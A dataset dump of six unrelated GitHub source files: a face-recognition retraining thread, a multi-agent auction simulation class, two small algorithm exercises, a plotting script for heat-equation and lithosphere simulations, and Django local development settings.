+{"seq_id":"39839324175","text":"\"\"\"\n\nThis class watches for updated encodings .pickle file from from retraining\nprocess and loads the new encodings.\n\n\"\"\"\nimport os\nimport sys\nimport time\nimport threading\nimport pickle\nimport numpy\nimport logging\n\nimport multiprocessing as mp\nfrom imutils import paths as imutils_paths\nfrom functools import partial\n\nfrom ai_service.retrain_model import train_image\nfrom ai_service import paths\n\n# number of retrain processes to launch\nNUM_PROCS = 2\n\nlogger = logging.getLogger(__name__)\n\n\ndef default_encodings_data():\n return {'encodings': [], 'names': [], 'image_paths': []}\n\n\nclass Trainer:\n thread = None # background thread that reads faces detected\n times_read = 0\n started_at = 0\n # default initial encodings data in case a client calls\n # get_encodings_data() before the pickle finishes loading\n # on startup\n encodings_data = default_encodings_data()\n # used to prompt the trainer thread to run _retrain_model()\n retrain_needed_event = threading.Event()\n\n # used by stats()\n # time it took to run retrain_model.py in seconds\n last_retrain_duration = 0\n # time it took to load the encodings from the pickle\n last_load_duration = 0\n # number of images last retrain\n last_num_retrained = 0\n\n # multiprocessing worker pool and queue allocated at thread start\n pool = None\n result_queue = None\n\n def __init__(self):\n if Trainer.thread is None:\n Trainer.thread = threading.Thread(target=self._thread)\n Trainer.thread.start()\n\n # Returns the last encoding data without waiting for any\n # retraining in progress\n\n def get_encodings_data(self):\n return Trainer.encodings_data\n\n # After new data/faces/face-n dirs are added, this method\n # is called. When the event is set, the trainer thread\n # is either sleeping waiting on the event or currently\n # retraining.\n #\n # It doesn't matter how far ahead or how many times this\n # is called while the trainer is training. When retraining\n # completes the trainer thread will immediately return from\n # event.wait and retrain again.\n #\n # There is a possibility that the trainer will get a partial\n # set of frames for a face since the Engagement thread is\n # possibly copying files to a face dir, but that should just make\n # for one or two weak / lower confidence face encodings which\n # will self correct on the next iteration of retrain_model()\n def trigger_retrain(self):\n Trainer.retrain_needed_event.set()\n\n def trigger_retrain_all(self):\n Trainer.encodings_data = default_encodings_data()\n self.trigger_retrain()\n\n @classmethod\n def stats(cls):\n fps = 0\n if cls.last_retrain_duration > 0:\n fps = cls.last_num_retrained / cls.last_retrain_duration\n\n return {\n \"lastLoad\": {\n \"duration\": cls.last_load_duration,\n },\n \"lastRetrain\": {\n \"duration\": cls.last_retrain_duration,\n \"count\": cls.last_num_retrained,\n \"fps\": fps\n },\n \"totals\": {\n \"encodings\": len(cls.encodings_data['encodings']),\n \"uniqueFaces\": len(numpy.unique(numpy.array(cls.encodings_data['names']))),\n \"uniqueFiles\": len(numpy.unique(numpy.array(cls.encodings_data['image_paths']))),\n }\n }\n\n @classmethod\n def _thread(cls):\n logger.info('Starting trainer thread.')\n cls.started_at = time.time()\n\n # In case a retrain request comes in while loading...\n cls.retrain_needed_event.clear()\n cls._load_encodings_from_file()\n\n cls.pool = mp.Pool(processes=NUM_PROCS)\n cls.result_queue = mp.Manager().Queue()\n\n while True:\n cls.retrain_needed_event.wait()\n cls.retrain_needed_event.clear()\n cls._retrain_model()\n time.sleep(0)\n\n @classmethod\n def _load_encodings_from_file(cls):\n if os.path.exists(paths.ENCODINGS_FILE_PATH):\n time_started = time.time()\n cls.last_modified = os.path.getmtime(paths.ENCODINGS_FILE_PATH)\n new_encodings_data = pickle.loads(\n open(paths.ENCODINGS_FILE_PATH, \"rb\").read(), encoding='latin1')\n\n cls.times_read += 1\n cls.encodings_data = new_encodings_data\n cls.last_load_duration = time.time() - time_started\n\n logger.info(\n f\"Trainer updated from {paths.ENCODINGS_FILE_PATH} in {cls.last_load_duration}s\")\n logger.info(\n f\"loaded {len(cls.encodings_data['encodings'])} encodings, {len(cls.encodings_data['names'])} names, and {len(cls.encodings_data['image_paths'])} image paths\")\n\n @classmethod\n def _save_encodings_to_file(cls):\n logger.info(\n f\"saving {len(cls.encodings_data['encodings'])} encodings, {len(cls.encodings_data['names'])} names, and {len(cls.encodings_data['image_paths'])} image paths\")\n with open(paths.ENCODINGS_FILE_PATH, 'wb') as fp:\n pickle.dump(cls.encodings_data, fp,\n protocol=pickle.HIGHEST_PROTOCOL)\n\n @classmethod\n def _find_untrained_file_paths(cls):\n image_paths = list(imutils_paths.list_images(paths.FACES_DATA_DIR))\n processed_paths = cls.encodings_data['image_paths']\n untrained_paths = [\n value for value in image_paths if value not in processed_paths]\n untrained_paths.sort()\n return untrained_paths\n\n @classmethod\n def _handle_retrain_result(cls, result):\n if not result:\n return\n\n logger.info(\n f\"got result from queue with {len(result['encodings'])} encodings for {result['name']} at {result['image_path']}\")\n\n if len(result['encodings']) == 0:\n cls.encodings_data['image_paths'].append(result['image_path'])\n else:\n for encoding in result['encodings']:\n cls.encodings_data['encodings'].append(encoding)\n cls.encodings_data['names'].append(result['name'])\n cls.encodings_data['image_paths'].append(\n result['image_path'])\n\n @classmethod\n def _retrain_model(cls):\n time_started = time.time()\n # calling the retrain_model function directly from\n # this thread and process caused a seg fault.\n # I suspect that calling face_locations() and\n # face_encodings() from face_recognition package\n # are not thread safe.\n #\n # See comment on this commit:\n # https://github.com/littlebee/shelly-bot/commit/1d18f1d26bdc0912bafb0fb7a3e480f88026a29d\n # dir_path = os.path.dirname(os.path.realpath(__file__))\n # os.system(f\"python3 {dir_path}/retrain_model.py\")\n\n untrained_file_paths = cls._find_untrained_file_paths()\n num_untrained = len(untrained_file_paths)\n logger.info(f\"found {num_untrained} untrained paths\")\n # prod_x has only one argument x (y is fixed to 10)\n train_image_partial = partial(train_image, queue=cls.result_queue)\n async_map = cls.pool.map_async(\n train_image_partial, untrained_file_paths)\n\n while not async_map.ready():\n result = None\n try:\n result = cls.result_queue.get(True, .25)\n except:\n pass\n cls._handle_retrain_result(result)\n\n while not cls.result_queue.empty():\n cls._handle_retrain_result(cls.result_queue.get())\n\n cls.last_retrain_duration = time.time() - time_started\n cls.last_num_retrained = num_untrained\n last_retrain_fps = num_untrained / cls.last_retrain_duration\n logger.info(\n f\"retraining complete. duration={cls.last_retrain_duration} fps={last_retrain_fps} \")\n\n cls._save_encodings_to_file()\n","repo_name":"littlebee/shelly-bot","sub_path":"src/ai_service/trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":7892,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"2902051851","text":"from .entity import Entity\nfrom enums import EntityTypes, ContainerState, ShipmentState\nfrom tools import surplus_maximisation, best_match\nfrom collections import namedtuple\nfrom tabulate import tabulate\n\nclass Auctioneer(Entity):\n \"\"\"\n All following functions are allocated to the class 'auctioneer'\n The parameters 'environment' and 'region_id' are assigned to the class\n Variables are assigned to all mentioned parameters\n\n \"\"\"\n def __init__(self, env, region):\n super().__init__()\n self.env = env\n self.region = region\n\n self.type = EntityTypes.AUCTIONEER\n\n self.entities = {}#create an empty dictionary\n\n self.auctionable_shipments = [] #create an empty list to which we can add all available shipments for auction\n self.container_bids = [] #create an empty list to which we can add all container bids\n\n self.account_value = 1000\n\n def auction(self):\n \"\"\"\n Auctions with the buyers and sellers provided to this Auctioneer.\n \"\"\"\n raise NotImplementedError(\"TODO\")\n\n def register(self, entity: Entity) -> int:\n \"\"\"\n Registers an agent with this Auctioneer.\n \"\"\"\n if entity.type not in self.entities.keys():\n self.entities[entity.type] = {}\n\n registration_key = self._registration(entity.type)\n self.entities[entity.type][registration_key] = entity\n\n if self.env.config.debug and self.region.id < 1:\n print(\"registration takes place in region: %s \"\n \"returned registration key: %s\"\n %(self.region.id,registration_key))\n\n return registration_key\n\n def unregister(self, type, registration_key) -> Entity:\n \"\"\"\n Unregisters an agent from this Auctioneer, using the assigned\n registration key.\n \"\"\"\n if type not in self.entities.keys():\n raise ValueError(\"Type `{0}' is not an understood entity!\"\n .format(type))\n\n return self.entities[type].pop(registration_key, False)\n\n def _registration(self, type):\n max_key = max(self.entities[type].keys(), default=0)\n\n for key in range(max_key): # attempt to fill `holes'\n if key not in self.entities[type].keys():\n return key\n\n return max_key + 1 # new key, one greater than the last\n\n def list_shipment(self, producer_bid): # name is porely chosen, easy way to change name in whole file?\n self.auctionable_shipments.append(producer_bid)\n\n def unlist_shipment(self,shipment_registration_key):\n self.auctionable_shipments = [producer_bid for producer_bid in self.auctionable_shipments\n if producer_bid.registration_key != shipment_registration_key]\n\n def list_container_bid(self, container_bid):\n self.container_bids.append(container_bid)\n\n def unlist_container_bid(self, container_registration_key):\n self.container_bids = [container_bid for container_bid in self.container_bids\n if container_bid.container_registration_key != container_registration_key]\n\n def match_containers_shipments(self):\n \"\"\"Matches the given list of container bids with list of avaiable shipments \"\"\"\n matches = surplus_maximisation(self.container_bids,\n self.auctionable_shipments)\n\n if self.env.config.debug:\n print(\"The following matches have been made in region %s:\"\n %(self.region.id))\n print(tabulate(matches, headers=[\"container registration key\",\n \"shipment registration key\",\n \"surplus\"]))\n return matches\n\n def invoice_producers(self, matches):\n ''' The auctioneer invoices the producer from the matched shipment.\n In the current situation, the auctioneer does not obtain part of the surplus.\n '''\n invoices = []\n invoice = namedtuple('invoice', 'producer_id shipment_id amount_due')\n if matches is not None: # required because if len = 0 the for loop will produce an error\n for match in matches:\n # obtain shipment that is matched, shipment cannot be yet removed, needed to assign to container later\n shipment = self.entities[EntityTypes.SHIPMENT][match.shipment_registration_key]\n # create invoice\n for producer_bid in self.auctionable_shipments:\n if producer_bid.registration_key == match.shipment_registration_key:\n new_invoice = invoice(producer_id= shipment.producer_id,\n shipment_id= shipment.id,\n amount_due= producer_bid.biddingvalue -\n self.env.config.producer_surplus_percentage * match.surplus)\n invoices.append(new_invoice)\n\n if self.env.config.debug:\n print(\"The following invoices have been created:\")\n print(tabulate(invoices, headers=[\"producer id\",\"shipment id\",\n \"amount due\"]))\n\n return invoices\n\n def pay_container(self,matches):\n # pay the container\n if matches is not None:\n for match in matches:\n container = self.entities[EntityTypes.CONTAINER][\n match.container_registration_key]\n\n if self.env.config.debug:\n account_value_before = self.account_value\n\n for container_bid in self.container_bids:\n if container_bid.container_registration_key == \\\n match.container_registration_key and \\\n container_bid.shipment_registration_key == \\\n match.shipment_registration_key:\n payment = container_bid.biddingvalue +\\\n self.env.config.container_surplus_percentage \\\n * match.surplus\n container.account_value += payment\n # remove payment amount from auctioneer account\n self.account_value -= payment\n\n if self.env.config.debug:\n print(tabulate([[self.region.id,account_value_before,\n payment, container.id, self.account_value]],\n headers=[\"region id\", \"account value before payment\",\n \"payment amount\", \"container id\",\n \"account value after payment\"]))\n\n return\n\n\n\n def finalize_matchmaking(self,matches):\n '''I made a seperate function to unregister both container and shipments, otherwise it messes up the\n for loops in the invoice and container payment functions. And it seems nice to have a payment check\n before the auctioneer finalizes its contact with the container and producer'''\n if matches is not None: #TODO omzetten zodat de for loop weer op de eerste indent zit\n for match in matches:\n shipment = self.unregister(EntityTypes.SHIPMENT, match.shipment_registration_key)\n shipment.state = ShipmentState.AWAITING_PICKUP\n #TODO wit regels toevoegen tussen verschillende blokken\n container = self.unregister(EntityTypes.CONTAINER,match.container_registration_key)\n container.state = ContainerState.NEEDING_TRANSPORT\n container.idle_days = 1 # reset to initial setting\n container.idle_hours = 0 # reset to initial setting\n container.shipment_contracts.append(shipment)\n self.unlist_shipment(match.shipment_registration_key)\n self.unlist_container_bid(match.container_registration_key)\n\n return\n\n def print_shipment_bid_info(self):\n if EntityTypes.SHIPMENT not in self.entities.keys():\n return\n registered_shipments = []\n for key in self.entities[EntityTypes.SHIPMENT]:\n for bid in self.auctionable_shipments:\n if key == bid.registration_key:\n bidding_value = bid.biddingvalue\n registered_shipments.append(\n [self.entities[EntityTypes.SHIPMENT][key].id, key, bidding_value])\n\n print(tabulate(registered_shipments,\n headers=[\"shipment id\",\n \"shipment registration key\",\n \"bidding value\"]))\n\n\n # just prints whatever the bids are in the container\n def print_container_bid_info(self):\n if EntityTypes.CONTAINER not in self.entities.keys():\n return\n registered_containers = []\n for bid in self.container_bids:\n for key in self.entities[EntityTypes.CONTAINER]:\n if key == bid.container_registration_key:\n container_id = self.entities[EntityTypes.CONTAINER][key].id\n container_registration_key= bid.container_registration_key\n biddingvalue = bid.biddingvalue\n shipment_registration_key = bid.shipment_registration_key\n registered_containers.append([container_id,\n container_registration_key,\n biddingvalue,\n shipment_registration_key])\n\n print(tabulate(registered_containers,\n headers=[\"container id\",\n \"container registration key\",\n \"bidding value\",\n \"shipment registration key\"]))\n\n # Function below is written for continuous environment\n def continuous_matching(self):\n # Continuous action runs for each container, therefore resulting in one\n # match at a time\n match = best_match(self.container_bids, self.auctionable_shipments)\n\n if self.env.config.debug:\n print(\"The following matches have been made in region %s:\"\n %(self.region.id))\n print(tabulate(match, headers=[\"container registration key\",\n \"shipment registration key\",\n \"surplus\"]))\n\n return match\n","repo_name":"anshum-gupta/Multi-Agent-System-Bidding-Bot","sub_path":"entities/auctioneer.py","file_name":"auctioneer.py","file_ext":"py","file_size_in_byte":10544,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"74940948378","text":"# baekjoon 알고리즘 1644\n# 2023.09.17 이주현\n\nimport sys\nimport math\n\nnum = int(sys.stdin.readline())\n\n# 에라토스테네스의 체 => 다시 보기\ncheck_array=[False,False] + [True for i in range(num-1)]\nfor i in range(2, int(num**0.5)+1): \n check_array[i*2::i] = [False]*((num-i)//i) \n\nprime_list = []\nfor i in range(num +1):\n if check_array[i]:\n prime_list.append(i)\n\n\nanswer = 0\nstart = 0\nend = 0\nwhile end <= len(prime_list):\n tmp = sum(prime_list[start:end])\n if tmp == num:\n answer += 1\n end += 1\n elif tmp < num:\n end += 1\n else:\n start += 1\n\nprint(answer)\n","repo_name":"beOk91/algo_pago_gago","sub_path":"src/ljh/baekjoon/silver/baekjoon_1644.py","file_name":"baekjoon_1644.py","file_ext":"py","file_size_in_byte":628,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"15294308829","text":"def count_animals(sentence):\n count = 0\n for i in sentence.split():\n if i.isdigit():\n x = int(i)\n count += x\n return count\n\n\nimport re\n\n\ndef CountAnimals(sentence):\n return sum(map(int, re.findall(r'\\d+', sentence)))\n","repo_name":"ictcubeMENA/Training_one","sub_path":"codewars/7kyu/dinamuh/HowManyAnimalsAreThere/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":258,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"24981324321","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom matplotlib.ticker import LinearLocator, FormatStrFormatter\nfrom matplotlib.pyplot import cm\nfrom tqdm import tqdm\nfrom matplotlib import rc\n\n\n#Latex font for plots\nrc('font', **{'family': 'serif', 'serif': ['Computer Modern']})\nrc('text', usetex=True)\nrc('font', family='serif')\nplt.rcParams.update({'font.size': 10}) # Setting all font sizes\n\n\nprint(\"Which Task you want to run 1-dim , 2-dim or Lithosphere?\")\nprint(\"Write 1 , 2 or 3\")\n\nTask = input(\"Write here: \")\n\nw = 5.78851 # Latex document text width\nif Task == \"1\":\n\n L = 1.0\n u_list = []\n x_list = []\n t_list = []\n\n for method in [\"Analytic:\",\"FE:\", \"BE:\", \"CN:\"]:\n for dx in [0.1, 0.01]:\n dt = 0.5*dx*dx\n #Generate t-mesh\n T = int(1.0/dt) #Number of time steps till final time\n t = np.zeros(T)\n for l in range(len(t)):\n t[l] = l*dt\n #Generate x-mesh\n N = int(1.0/dx) #Number of integration points along x-axis (inner points only)\n x = np.zeros(N+2)\n for k in range(len(x)):\n x[k] = k/(N+1)\n if method == \"FE:\":\n x_list.append(x)\n t_list.append(t)\n\n with open (method+str(dx)) as file:\n lines = file.readlines()\n u = np.zeros((len(lines),len(lines[0].split())))\n for i in range(len(lines)):\n u[i,:] = lines[i].split()\n\n u_list.append(u)\n\n fig = plt.figure();\n x,t = np.meshgrid(x,t)\n\n\n ax = fig.gca(projection='3d');\n # Plot the surface.\n surf = ax.plot_surface(x, t, u, cmap=cm.coolwarm,\n linewidth=0, antialiased=False);\n # Customize the z axis.\n #ax.set_zlim(-0.10, 1.40);\n for angle in range(0,230):\n ax.view_init(40,angle)\n ax.zaxis.set_major_locator(LinearLocator(10));\n ax.zaxis.set_major_formatter(FormatStrFormatter('%.02f'));\n plt.xlabel(\"x\")\n plt.ylabel(\"t\")\n name = method+\" dx = \"+str(dx)\n plt.title(name)\n #fig.savefig(\"plots/\"+name+\".png\")\n\n\n dx = [0.1, 0.01]\n for i in range(2):\n fig = plt.figure();\n fig.set_size_inches(w=w*0.8,h= 4.5)\n plt.title(\"Computed solutions at time = 0.1 \\n dx = %g\" % (dx[i]))\n plt.plot(x_list[i], u_list[i][int(len(t_list[i])/10)], \".\")\n plt.plot(x_list[i], u_list[2+i][int(len(t_list[i])/10)], \".\")\n plt.plot(x_list[i], u_list[4+i][int(len(t_list[i])/10)], \".\")\n plt.plot(x_list[i], u_list[6+i][int(len(t_list[i])/10)])\n #plt.plot(x_analytic, u_analytic[int(len(t_analytic)/10)])\n plt.legend([\"FE\", \"BE\", \"CN\", \"Analytic\"])\n plt.xlabel(\"x\")\n plt.ylabel(\"u(x,t=0.1)\")\n plt.savefig(\"plots/1dim/Comparison_0.1_\"+str(dx[i])+\".pgf\")\n\n\n fig = plt.figure();\n plt.title(\"Absolute difference between computed and analytical at time = 0.1 \\n dx = %g\" % (dx[i]))\n plt.plot(x_list[i], abs(u_list[i][int(len(t_list[i])/10)] - u_list[6+i][int(len(t_list[i])/10)]), \".\")\n plt.plot(x_list[i], abs(u_list[2+i][int(len(t_list[i])/10)] - u_list[6+i][int(len(t_list[i])/10)]), \".\")\n plt.plot(x_list[i], abs(u_list[4+i][int(len(t_list[i])/10)] - u_list[6+i][int(len(t_list[i])/10)]), \".\")\n plt.plot(x_list[i], abs(u_list[6+i][int(len(t_list[i])/10)] - u_list[6+i][int(len(t_list[i])/10)]))\n #plt.plot(x_analytic, u_analytic[0])\n plt.legend([\"FE\", \"BE\", \"CN\", \"Analytic\"])\n plt.xlabel(\"x\")\n plt.ylabel(\"u(x,t=0.1) - $u_{exact}$(x,t=0.1)\")\n #plt.ylim((-10**(-5),10**(-3)))\n plt.savefig(\"plots/1dim/Differences_0.1_\"+str(dx[i])+\".pgf\")\n plt.show()\n\n for i in range(2):\n fig = plt.figure();\n plt.title(\"Computed solutions at time = 0.2 \\n dx = %g\" % (dx[i]))\n plt.plot(x_list[i], u_list[i][int(len(t_list[i])/5)], \".\")\n plt.plot(x_list[i], u_list[2+i][int(len(t_list[i])/5)], \".\")\n plt.plot(x_list[i], u_list[4+i][int(len(t_list[i])/5)], \".\")\n plt.plot(x_list[i], u_list[6+i][int(len(t_list[i])/5)])\n #plt.plot(x_analytic, u_analytic[int(len(t_analytic)/5)])\n plt.legend([\"FE\", \"BE\", \"CN\", \"Analytic\"])\n plt.xlabel(\"x\")\n plt.ylabel(\"u(x,t=0.2)\")\n plt.savefig(\"plots/1dim/Comparison_0.2_\"+str(dx[i])+\".pgf\")\n\n fig = plt.figure();\n plt.title(\"Absolute difference between computed and analytical at time = 0.2 \\n dx = %g\" % (dx[i]))\n plt.plot(x_list[i], abs(u_list[i][int(len(t_list[i])/5)] - u_list[6+i][int(len(t_list[i])/5)]), \".\")\n plt.plot(x_list[i], abs(u_list[2+i][int(len(t_list[i])/5)] - u_list[6+i][int(len(t_list[i])/5)]), \".\")\n plt.plot(x_list[i], abs(u_list[4+i][int(len(t_list[i])/5)] - u_list[6+i][int(len(t_list[i])/5)]), \".\")\n plt.plot(x_list[i], abs(u_list[6+i][int(len(t_list[i])/5)] - u_list[6+i][int(len(t_list[i])/5)]))\n #plt.plot(x_analytic, u_analytic[int(len(t_analytic)/5)])\n plt.legend([\"FE\", \"BE\", \"CN\", \"Analytic\"])\n plt.xlabel(\"x\")\n plt.ylabel(\"u(x,t=0.2) - $u_{exact}$(x,t=0.2)\")\n #plt.ylim((-10**(-5),10**(-3)))\n plt.savefig(\"plots/1dim/Differences_0.2_\"+str(dx[i])+\".pgf\")\n plt.show()\n\n\nelif Task == \"2\":\n\n L = 1.0\n u_list = []\n dxlist = [0.1,0.01]\n\n for method in [\"Analytic\",\"Implicit\"]:\n for dx in dxlist:\n #2 different dt for analysing stability of scheme\n dtlist = [dx,dx/10,dx/100]\n for dt in dtlist:\n T = int(1.0/dt)\n #Generate t-mesh\n t = np.linspace(0,1,T)\n #Generate x- and y-mesh\n N = int(1.0/dx)\n x = np.linspace(0,1,N+2)\n y = np.linspace(0,1,N+2)\n filename = \"2dim_\"+method+\":dx=\"+str(dx)+\"dt=\"+str(dt)\n time = int(0.01*T) #The time we choose to sample the solution at\n with open(filename) as file:\n\n lines = file.readlines()\n u = np.zeros((len(x),len(y)))\n for i in range(len(y)):\n data = lines[time*len(x)+i].split()\n\n u[i] = data\n\n if dt == dx:\n fig = plt.figure();\n fig.set_size_inches(w=w*0.8,h= 3.5)\n x_,y_ = np.meshgrid(x,y)\n\n ax = fig.gca(projection='3d',xlim = (0,1.0),ylim = (0,1.0),zlim = (0,1.0));\n # Plot the surface.\n surf = ax.plot_surface(x_, y_, u, cmap=cm.coolwarm,\n linewidth=0, antialiased=False);\n # Customize the z axis.\n #ax.set_zlim(-0.10, 1.40);\n for angle in range(0,230):\n ax.view_init(40,angle)\n ax.zaxis.set_major_locator(LinearLocator(10));\n ax.zaxis.set_major_formatter(FormatStrFormatter('%.02f'));\n plt.xlabel(\"x\")\n plt.ylabel(\"y\")\n name = \"2-dim \"+method+\": dx = \"+str(dx)\n plt.title(name)\n fig.savefig(\"plots/2dim/\"+method+\"/\"+str(dx)+\"/\"+name.replace(\" \",\"\")+\".pgf\")\n plt.close()\n\n #Printing maximum absolute differences\n u_list.append(u)\n combinations = len(dxlist)*3\n print(\"Mean absolute differences between implicit and analytical\")\n for i in range(combinations):\n diff = np.mean(abs(u_list[i]-u_list[combinations+i]))\n\n print(diff)\n\nelif Task == \"3\":\n w = 5.78851 # Latex document text width\n #fig = plt.figure();\n #fig.set_size_inches(w=w*1.0,h= 4.0)\n\n # Analytical solution to heat production\n analytic = []\n x = np.linspace(0,120,101)\n x_ = [x[:17],x[17:34],x[34:]]\n z_ = [\n [-0.28,-23.66,8],\n [-0.07,-15.26,92],\n [-0.01,-10.46,188]\n ]\n y2 = []\n for x,zone in zip(x_,z_):\n y = np.polyval(zone,-x)\n y2.append(y)\n\n\n analytic.append(np.concatenate((y2[0],y2[1],y2[2])))\n # Analytical solution to heat production + radioactive enrichment\n z_ = [\n [-0.28,-29,8],\n [-0.07,-20.6,92],\n [-0.11,-23.8,28]\n ]\n y3 = []\n for x,zone in zip(x_,z_):\n y = np.polyval(zone,-x)\n y3.append(y)\n analytic.append(np.concatenate((y3[0],y3[1],y3[2])))\n \"\"\"\n for i in range(len(analytic)):\n # Analytical solution of heat production plot\n plt.plot(np.linspace(0,120,101),analytic[i],\"--\")\n plt.xlabel(\"Depth [km]\")\n plt.ylabel(r\"Temperature $[^\\circ C]$\")\n plt.grid()\n plt.legend([\"Heat\",\"Enriched mantle $\\\\&$ No Decay\"])\n plt.title(\"Analytical\")\n plt.savefig(\"plots/Lithosphere/Analytical.pgf\")\n plt.show()\n \"\"\"\n\n #fig = plt.figure();\n #fig.set_size_inches(w=w*1.0,h= 4.0)\n Nx = 126\n Ny = 101\n u = np.zeros((Nx,Ny))\n numerical = []\n for filename in [\"Heat\",\"No_Decay\", \"Decay\"]:\n dx = 0.01\n dt = dx\n T = int(1.0/dt)\n #Generate t-mesh\n t = np.linspace(0,1,T)\n #Generate x- and y-mesh\n N = int(1.0/dx)\n with open(filename) as file:\n lines = file.readlines()\n for t in tqdm(range(T)):\n for i in range(Nx):\n data = lines[t*Nx+i].split()\n\n u[i] = data\n\n\n temp = u[int(Nx/2)]*1292 + 8\n depth = np.linspace(0,120,Ny)\n numerical.append(temp)\n # Numerical simulation of heat production plot\n \"\"\"\n plt.plot(depth,temp)\n plt.xlabel(\"Depth [km]\")\n plt.ylabel(r\"Temperature $[^\\circ C]$\")\n \"\"\"\n\n \"\"\"\n plt.legend([\"Heat\", \"Enriched mantle $\\\\&$ No Decay\"])\n plt.title(\"Numerical\")\n plt.grid()\n plt.savefig(\"plots/Lithosphere/Numerical.pgf\")\n plt.show()\n \"\"\"\n\n # Numerical vs Analytical for case 1 & 2 plot\n fig = plt.figure();\n fig.set_size_inches(w=w*1.0,h= 4.0)\n x = np.linspace(0,120,101)\n for i in range(len(analytic)):\n a = np.array(analytic[i])\n n = np.array(numerical[i])\n plt.plot(x,a)\n plt.plot(x,n,\"--\")\n plt.xlabel('Depth [km]')\n plt.ylabel(r\"Temperature $[^\\circ C]$\")\n plt.grid()\n plt.legend([\"Analytical: Heat\",\"Numerical: Heat\",\"Analytical: Enriched mantle $\\\\&$ No Decay\",\"Numerical: Enriched mantle $\\\\&$ No Decay\"])\n plt.savefig(\"plots/Lithosphere/Comparison.pgf\")\n plt.show()\n\n\n # Relative error plot\n fig = plt.figure();\n fig.set_size_inches(w=w*1.0,h= 4.0)\n x = np.linspace(0,120,101)\n for i in range(len(analytic)):\n a = np.array(analytic[i])\n n = np.array(numerical[i])\n z = abs((a-n)/(a))\n plt.plot(x[1:-1],z[1:-1])\n plt.yscale('log')\n plt.xlabel('Depth [km]')\n plt.ylabel('Relative error')\n plt.grid()\n plt.legend([\"Heat\",\"Enriched mantle $\\\\&$ No Decay\"])\n plt.savefig(\"plots/Lithosphere/Relative_Error.pgf\")\n plt.show()\n\n\n # Comparison between Numerical simulation of Decay and No Decay plot\n fig = plt.figure();\n fig.set_size_inches(w=w*1.0,h= 4.0)\n x = np.linspace(0,120,101)\n for i in range(1,len(numerical)):\n n = np.array(numerical[i])\n plt.plot(x,n)\n plt.xlabel('Depth [km]')\n plt.ylabel(r\"Temperature $[^\\circ C]$\")\n plt.grid()\n plt.title(\"Numerical Simulation\")\n plt.legend([\"Enriched mantle $\\\\&$ No Decay\", \"Enriched mantle $\\\\&$ Decay\"])\n plt.savefig(\"plots/Lithosphere/Decay_NoDecay.pgf\")\n plt.show()\n\n #Plots the difference at the end of the simulation with and without decay\n nodecay = np.zeros((Nx,Ny))\n decay = np.zeros((Nx,Ny))\n for filename in [\"No_Decay\", \"Decay\"]:\n dx = 0.01\n dt = dx\n T = int(1.0/dt)\n #Generate t-mesh\n t = np.linspace(0,1,T)\n #Generate x- and y-mesh\n N = int(1.0/dx)\n with open(filename) as file:\n lines = file.readlines()\n for t in tqdm(range(T)):\n for i in range(Nx):\n data = lines[t*Nx+i].split()\n if filename == \"No_Decay\":\n nodecay[i] = data\n\n elif filename == \"Decay\":\n decay[i] = data\n\n decay = decay*1292 + 8 # Scaling [0,1] --> [8,1300]\n nodecay = nodecay*1292 + 8 # Scaling [0,1] --> [8,1300]\n diff = (nodecay - decay)\n x = np.linspace(0,150,Nx)\n y = np.linspace(0,120,Ny)\n levels = np.linspace(0,35,100)\n plt.contourf(x,y,diff.T,levels=levels)\n cbar = plt.colorbar(ticks=[0,7,14,21,28,35])\n cbar.set_label(r\"$T_{diff} [^\\circ C]$\")\n plt.xlabel(\"Width [km]\")\n plt.ylabel(\"Depth [km]\")\n plt.savefig(\"plots/Lithosphere/Tdiff.pgf\")\n plt.show()\n\n maxtemp = np.max(diff.T)\n depth = np.argmax(diff.T[:,int(Nx/2)],axis=0)\n width = np.argmax(diff.T[int(Ny/2),:],axis=0)\n print(\"Max Temperature Difference = %g, happens at Depth = %g & Width = %g\" % (maxtemp, depth*1.2, width*1.2))\n\n\n#, \"Enriched mantle $\\\\&$ Decay\"\nelse:\n print(\"Please write either 1, 2 or 3\")\n","repo_name":"Moejay10/FYS4150","sub_path":"Project5/Codes/plotter.py","file_name":"plotter.py","file_ext":"py","file_size_in_byte":13521,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"75067044378","text":"from .dev import *\nfrom .dev import env\n\nDEBUG = True\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = env(\n \"DJANGO_SECRET_KEY\",\n default=\"django-insecure-bomhcbhc#rmqp9&4k$_0sse4rc(a$#8jrahz(h%m!ud_so66$x\",\n)\n\nALLOWED_HOSTS = [\"localhost\", \"0.0.0.0\", \"127.0.0.1\"]\n\nEMAIL_BACKEND = \"djcelery_email.backends.CeleryEmailBackend\"\nEMAIL_HOST = env(\"EMAIL_HOST\", default=\"mailhog\")\nEMAIL_PORT = env(\"EMAIL_PORT\")\nDEFAULT_FROM_EMAIL = \"chandranandan.chandrakar@gmail.com\"\nDOMAIN = env(\"DOMAIN\")\nSITE_NAME = \"Django Content\"\n","repo_name":"implicitdefcncdragneel/django-content-dev-prod","sub_path":"djangocontent/settings/local.py","file_name":"local.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
